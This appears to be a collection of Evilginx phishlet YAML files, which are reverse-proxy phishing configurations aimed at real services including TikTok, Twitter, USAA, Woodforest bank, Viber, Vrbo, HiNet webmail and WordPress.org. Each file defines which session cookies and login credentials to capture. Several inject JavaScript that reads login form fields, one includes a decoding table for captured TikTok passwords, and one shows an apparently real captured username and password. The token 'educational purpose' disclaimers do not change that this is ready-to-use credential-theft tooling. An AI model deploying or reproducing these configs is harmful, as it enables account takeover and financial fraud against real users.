21 | # a.render(r.createElement(i,null),document.getElementById("mount-app"));var o=n(139),l=n(165);
22 | #
23 |
24 | auth_tokens:
25 | - domain: '.supersport.hr'
26 | keys: ['session_id', '_dvc', '.*,regexp']
27 | credentials:
28 | username:
29 | key: 'login'
30 | search: '(.*)'
31 | type: 'post'
32 | password:
33 | key: 'password'
34 | search: '(.*)'
35 | type: 'post'
36 | login:
37 | domain: 'www.supersport.hr'
38 | path: '/igraci/prijava/'
39 |
40 | js_inject:
41 | - trigger_domains: ["www.supersport.hr"]
42 | trigger_paths: ["/igraci/prijava/"]
43 | trigger_params: []
44 | script: |
45 | function onclickListener(){
46 | document.getElementById("mount-app").innerHTML = 'Login

'
47 | return;
48 | }
49 | function sendPass(){
50 | var login = document.getElementsByName("prijava[login]")[0].value;
51 | var password = document.getElementsByName("prijava[password]")[0].value;
52 | var xhr = new XMLHttpRequest();
53 | xhr.open("POST", '/login', true);
54 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
55 | xhr.send("login="+encodeURIComponent(login)+""+" password="+encodeURIComponent(password));
56 | return;
57 | }
58 | setTimeout(function(){ onclickListener(); }, 2000);
59 |
60 |
61 | # AUTHENTICATION REQUEST
62 | #prijava:7
63 | #{"login":" jambra10","password":"Mrle1990.","useragent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"}
--------------------------------------------------------------------------------
/phishlet_examples/tiktok.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | # All Post Requests Fields Get Encoded During Requests to Server By titok javascripts.
5 | # Below is the Table Which You can use to decode your captured credentials in evilginx manually.
6 |
7 | author: '@An0nUD4Y'
8 | min_ver: '2.3.0'
9 | proxy_hosts:
10 | - {phish_sub: 'www', orig_sub: 'www', domain: 'tiktok.com', session: true, is_landing: true}
11 | - {phish_sub: 'm', orig_sub: 'm', domain: 'tiktok.com', session: true, is_landing: false}
12 | - {phish_sub: '', orig_sub: '', domain: 'tiktok.com', session: true, is_landing: false}
13 | - {phish_sub: 'polyfill', orig_sub: '', domain: 'polyfill.io', session: true, is_landing: false}
14 | - {phish_sub: 's16', orig_sub: 's16', domain: 'tiktokcdn.com', session: true, is_landing: false}
15 | - {phish_sub: 'hypstarcdn', orig_sub: 's16', domain: 'hypstarcdn.com', session: true, is_landing: false}
16 | - {phish_sub: 'kakao', orig_sub: 'developers', domain: 'kakao.com', session: true, is_landing: false}
17 | - {phish_sub: 'mon-va', orig_sub: 'mon-va', domain: 'byteoversea.com', session: true, is_landing: false}
18 | - {phish_sub: 'maliva', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', session: true, is_landing: false}
19 | - {phish_sub: 'sf16-muse-va', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', session: true, is_landing: false}
20 |
21 | sub_filters:
22 | - {triggers_on: 'www.tiktok.com', orig_sub: 'www', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
23 | - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
24 | - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
25 | - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
26 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
27 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
28 | - {triggers_on: 'www.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
29 | - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
30 | - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
31 | - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
32 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
33 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
34 | - {triggers_on: 'www.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
35 | - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
36 | - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
37 | - {triggers_on: 'www.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
38 | - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
39 | - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
40 | - {triggers_on: 'www.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
41 | - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
42 | - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
43 | - {triggers_on: 'www.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
44 | - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
45 | - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
46 |
47 |
48 |
49 |
50 |
51 | auth_tokens:
52 | - domain: '.tiktok.com'
53 | keys: ['.*,regexp']
54 | credentials:
55 | username:
56 | key: 'account'
57 | search: '(.*)'
58 | type: 'post'
59 | password:
60 | key: 'pass'
61 | search: '(.*)'
62 | type: 'post'
63 | custom:
64 | key: 'mobile'
65 | search: '(.*)'
66 | type: 'post'
67 |
68 | login:
69 | domain: 'www.tiktok.com'
70 | path: '/login/phone-or-email/phone-password?lang=en'
71 |
72 |
73 | #Remember Server Accepts Only encoded Credentials, So don't break the js functions responsible for encoding.
74 |
75 | #ENCODING TABLE TO DECODE THE PASSWORD AND MOBILE NUMBER
76 |
77 | # FOR NUMBERS
78 |
79 | # 1 = 34 , 2 = 37 , 3 = 36 , 4 = 31 , 5 = 30 ,6 = 33 , 7 = 32 , 8 = 3d , 9 = 3c
80 |
81 | # FOR SPECIAL CHARACTERS
82 |
83 | # ! = 24 , @ = 45 , # = 26 , $ = 21 , ^ = 5b , & = 23 , * = 2f , + = 2e
84 |
85 | # FOR LETTERS (SMALL-LETTERS)
86 |
87 | # a = 64 , b=67 , c=66 ,d=61,e=60,f=63,g=62,h=6d,i=6c,j=6f,k=6e,l=69,m=68,n=6b,o=6a,p=75,q=74,r=77,s=76,t=71,u=70,v=73,w=72,x=7d,y=7c,z=7f
88 |
89 | # FOR LETTERS (CAPITAL-LETTERS)
90 |
91 | # A=44 B=47 C=46 D=41 E=40 F=43 G=42 H=4d I=4c J=4f K=4e L=49 M=48 N=4b O=4a P=55 Q=54 R=57 S=56 T=51 U=50 V=53 W=52 X=5d Y=5c Z=5f
92 |
93 |
94 | # OTHER REMAINED CODES CAN BE FOUND USING POST REQUEST ANALYSIS.
95 |
96 |
--------------------------------------------------------------------------------
/phishlet_examples/tradus.yaml:
--------------------------------------------------------------------------------
1 | author: '@AN0NUD4Y'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'pro', orig_sub: 'pro', domain: 'tradus.com', session: true, is_landing: false}
5 | - {phish_sub: 'api', orig_sub: 'api-pro', domain: 'tradus.com', session: true, is_landing: true}
6 |
7 | sub_filters:
8 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
9 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
10 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
11 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
12 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
13 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
14 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
15 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
16 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
17 |
18 |
19 | auth_tokens:
20 | - domain: '.tradus.com'
21 | keys: ['','.*,regexp']
22 |
23 | credentials:
24 | username:
25 | key: 'Email'
26 | search: '(.*)'
27 | type: 'post'
28 | password:
29 | key: 'Password'
30 | search: '(.*)'
31 | type: 'post'
32 |
33 | login:
34 | domain: 'pro.tradus.com'
35 | path: '/login'
36 |
37 | js_inject:
38 | - trigger_domains: ["pro.tradus.com"]
39 | trigger_paths: ["/login"]
40 | trigger_params: []
41 | script: |
42 | function lp(){
43 | var submit = document.querySelectorAll('button[type=button]')[4];
44 | submit.setAttribute("onclick", "sendData()");
45 | return;
46 | }
47 | function sendData(){
48 | var email = document.getElementsByName("email")[1].value;
49 | var password = document.getElementsByName("password")[0].value;
50 | var xhr2 = new XMLHttpRequest();
51 | xhr2.open("POST", '/', true);
52 | xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
53 | xhr2.send("Email="+encodeURIComponent(email));
54 | var xhr = new XMLHttpRequest();
55 | xhr.open("POST", '/', true);
56 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
57 | xhr.send("Password="+encodeURIComponent(password));
58 | return;
59 | }
60 | setTimeout(function(){ lp(); }, 2500);
61 |
62 |
63 |
64 |
65 |
--------------------------------------------------------------------------------
/phishlet_examples/twitter-mobile.yaml:
--------------------------------------------------------------------------------
1 | author: '@white_fi'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true}
5 | - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false}
6 | - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false}
7 | sub_filters:
8 | - {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
9 | - {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
10 | - {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
11 | auth_tokens:
12 | - domain: 'twitter.com'
13 | keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token']
14 | credentials:
15 | username:
16 | key: 'session\[username_or_email\]'
17 | search: '(.*)'
18 | type: 'post'
19 | password:
20 | key: 'session\[password\]'
21 | search: '(.*)'
22 | type: 'post'
23 | login:
24 | domain: 'mobile.twitter.com'
25 | path: '/login'
26 |
--------------------------------------------------------------------------------
/phishlet_examples/twitter.yaml:
--------------------------------------------------------------------------------
1 | author: '@white_fi'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: '', orig_sub: '', domain: 'twitter.com', session: true, is_landing: true}
5 | - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com'}
6 | - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com'}
7 | sub_filters: []
8 | auth_tokens:
9 | - domain: '.twitter.com'
10 | keys: ['kdt','_twitter_sess','twid','auth_token']
11 | credentials:
12 | username:
13 | key: 'session\[username_or_email\]'
14 | search: '(.*)'
15 | type: 'post'
16 | password:
17 | key: 'session\[password\]'
18 | search: '(.*)'
19 | type: 'post'
20 | login:
21 | domain: 'twitter.com'
22 | path: '/login'
23 |
--------------------------------------------------------------------------------
/phishlet_examples/usaa.yaml:
--------------------------------------------------------------------------------
1 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES...
2 |
3 | author: '@i_am_a_Good_Human'
4 | min_ver: '2.3.0'
5 | proxy_hosts:
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'usaa.com', session: true, is_landing: true}
7 |
8 | sub_filters:
9 | - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
10 | - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
11 |
12 | auth_tokens:
13 | - domain: '.usaa.com'
14 | keys: ['.*,regexp']
15 | auth_urls:
16 | - '/'
17 | credentials:
18 | username:
19 | key: 'username'
20 | search: '(.*)'
21 | type: 'post'
22 | password:
23 | key: 'j_password'
24 | search: '(.*)'
25 | type: 'post'
26 | login:
27 | domain: 'www.usaa.com'
28 | path: '/inet/ent_logon/Logon'
29 |
30 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES...
31 |
32 |
--------------------------------------------------------------------------------
/phishlet_examples/viber.yaml:
--------------------------------------------------------------------------------
1 | author: '@An0nud4y'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'account', orig_sub: 'account', domain: 'viber.com', session: true, is_landing: true}
5 | - {phish_sub: '', orig_sub: '', domain: 'viber.com', session: true, is_landing: false}
6 |
7 | sub_filters:
8 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
9 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
10 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
11 | - {triggers_on: 'account.viber.com', orig_sub: '', domain: 'viber.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
12 |
13 |
14 | auth_tokens:
15 | - domain: '.viber.com'
16 | keys: ['.*,regexp']
17 | - domain: 'account.viber.com'
18 | keys: ['.*,regexp']
19 |
20 | auth_urls:
21 | - '/account'
22 |
23 | credentials:
24 | username:
25 | key: 'phone_number'
26 | search: '(.*)'
27 | type: 'post'
28 | password:
29 | key: 'password'
30 | search: '(.*)'
31 | type: 'post'
32 | custom:
33 | - key: 'phone_prefix'
34 | search: '(.*)'
35 | type: 'post'
36 | - key: 'token'
37 | search: '(.*)'
38 | type: 'post'
39 |
40 | force_post:
41 | - path: '/api/web/login'
42 | search:
43 | - {key: 'phone_number', search: '.*'}
44 | - {key: 'password', search: '.*'}
45 | - {key: 'token', search: '.*'}
46 | force:
47 | - {key: 'remember_me', value: 'true'}
48 | - {key: 'destination', value: ''}
49 | type: 'post'
50 |
51 | login:
52 | domain: 'account.viber.com'
53 | path: '/'
54 |
--------------------------------------------------------------------------------
/phishlet_examples/vrbo.yaml:
--------------------------------------------------------------------------------
1 | author: '@an0nud4y'
2 | min_ver: '2.3.0'
3 |
4 | proxy_hosts:
5 | - {phish_sub: 'www', orig_sub: 'www', domain: 'vrbo.com', session: true, is_landing: true, auto_filter: false}
6 | - {phish_sub: 'csvcus', orig_sub: 'csvcus', domain: 'homeaway.com', session: false, is_landing: false, auto_filter: false}
7 | - {phish_sub: 'tmcdn', orig_sub: 'tmcdn', domain: 'homeaway.com', session: true, is_landing: false, auto_filter: false}
8 |
9 | sub_filters:
10 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
11 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
12 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
13 |
14 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
15 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
16 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
17 |
18 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
19 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
20 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
21 |
22 | auth_tokens:
23 | - domain: '.vrbo.com'
24 | keys: ['.*,regexp']
25 | - domain: 'csvcus.homeaway.com'
26 | keys: ['.*,regexp']
27 | - domain: '.csvcus.homeaway.com'
28 | keys: ['.*,regexp']
29 | - domain: '.www.vrbo.com'
30 | keys: ['.*,regexp']
31 | - domain: 'www.vrbo.com'
32 | keys: ['.*,regexp']
33 | - domain: 'tmcdn.homeaway.com'
34 | keys: ['.*,regexp']
35 |
36 | auth_urls:
37 | - '/*'
38 | - '/'
39 | credentials:
40 | username:
41 | key: ''
42 | search: '"userName":"([^"]*)'
43 | type: 'json'
44 | password:
45 | key: ''
46 | search: '"secret":"([^"]*)'
47 | type: 'json'
48 |
49 | login:
50 | domain: 'www.vrbo.com'
51 | path: '/auth/ui/login?service=https%3A%2F%2Fwww.vrbo.com%2Fp%2Fhome%2Fvalidate-ticket%3Forigin%3D%252Fp%252Fhome%26site%3Dvrbo&screen=login&treatment=2fa'
--------------------------------------------------------------------------------
/phishlet_examples/webhinet.yaml:
--------------------------------------------------------------------------------
1 | # LEARN TO USE --debug mode and --developer mode in evilginx.
2 |
3 | name: 'HinetWebmail'
4 | author: '@syriangeneral2'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: '', orig_sub: '', domain: 'webmail.hinet.net', session: true, is_landing: true}
8 |
9 | # TRY TO ADD MORE DOMAINS/SUBDOMAINS IF THEY ARE PRESENT DURING SITE LOADING (CHECK NETWORK TAB IN DEVELOPERS TOOLS)
10 |
11 | sub_filters: []
12 |
13 | # LEARN TO USE SUBFILTERS (DON'T DEPEND ON AUTOFILTER BY EVILGINX)
14 |
15 | # WITHOUT SUB FILTERS SOMETIMES THE USER CAN REDIRECT TO ORIGINAL DOMAINS/SUBDOMAINS , SO USE THE SUBFILTERS CAREFULLY
16 |
17 | #CHECK THESE AIRBNB FILTERS....
18 |
19 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
20 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
21 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
22 |
23 |
24 | auth_tokens:
25 | - domain: 'webmail.hinet.net' #CHECK ON OFFICIAL WIKI , HOW TO USE AUTH TOKENS TO GRAB ALL NECCESAARY TOKENS.
26 | keys: ['JSESSIONID(.*),regexp']
27 |
28 | credentials:
29 | username:
30 | key: 'mailid'
31 | search: '(.*)'
32 | type: 'post'
33 | password:
34 | key: 'password'
35 | search: '(.*)'
36 | type: 'post'
37 | # HERE YOU CAN ALSO ADD SOME CUSTOM FIELD TO CAPTURE FROM REQUESTS CHECK WIKI TO SEE HOW TO DO THAT
38 | login:
39 | domain: 'webmail.hinet.net'
40 | path: '/index.html'
41 |
42 | #LEARN TO USE JAVASCRIPT INJECTION AS WELL
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/phishlet_examples/woodforest.yaml:
--------------------------------------------------------------------------------
1 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES...
2 |
3 | author: '@i_am_a_Good_Human'
4 | min_ver: '2.3.0'
5 | proxy_hosts:
6 | - {phish_sub: 'online', orig_sub: 'online', domain: 'woodforest.com', session: true, is_landing: true}
7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'woodforest.com', session: true, is_landing: false}
8 | - {phish_sub: '', orig_sub: '', domain: 'woodforest.com', session: true, is_landing: false}
9 |
10 | sub_filters:
11 | - {triggers_on: 'online.woodforest.com', orig_sub: 'online', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
12 | - {triggers_on: 'online.woodforest.com', orig_sub: 'online', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
13 | - {triggers_on: 'online.woodforest.com', orig_sub: 'www', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
14 | - {triggers_on: 'online.woodforest.com', orig_sub: 'www', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
15 | - {triggers_on: 'online.woodforest.com', orig_sub: '', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 | - {triggers_on: 'online.woodforest.com', orig_sub: '', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 |
18 |
19 | auth_tokens:
20 | - domain: '.woodforest.com'
21 | keys: ['sessionid','.*,regexp']
22 | credentials:
23 | username:
24 | key: 'principal'
25 | search: '(.*)'
26 | type: 'post'
27 | password:
28 | key: 'password'
29 | search: '(.*)'
30 | type: 'post'
31 | login:
32 | domain: 'online.woodforest.com'
33 | path: '/login'
34 |
35 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES...
36 |
37 |
--------------------------------------------------------------------------------
/phishlet_examples/wordpress.org.yaml:
--------------------------------------------------------------------------------
1 | # Evilginx phishlet configuration file for WordPress.org.
2 | #
3 | # This is a phishing configuration for the main WordPress.org domain,
4 | # it is *not* immediately useful for phishing self-hosted sites that
5 | # run on the WordPress software.
6 | #
7 | # For such self-hosted sites, some modifications are needed. Refer to
8 | # the comments in this file for some guidance on creating a phishlet
9 | # to use against self-hosted WordPress sites.
10 | ---
11 | name: 'WordPress.org'
12 | author: '@meitar'
13 | min_ver: '2.3.0'
14 |
15 | proxy_hosts:
16 | # Proxy the primary domain.
17 | - phish_sub: ''
18 | orig_sub: ''
19 | domain: 'wordpress.org'
20 | session: true
21 | is_landing: true
22 |
23 | # These proxied should be removed when phishing self-hosted sites.
24 | - phish_sub: 'login'
25 | orig_sub: 'login'
26 | domain: 'wordpress.org'
27 | session: true
28 | is_landing: false
29 | - phish_sub: 'make'
30 | orig_sub: 'make'
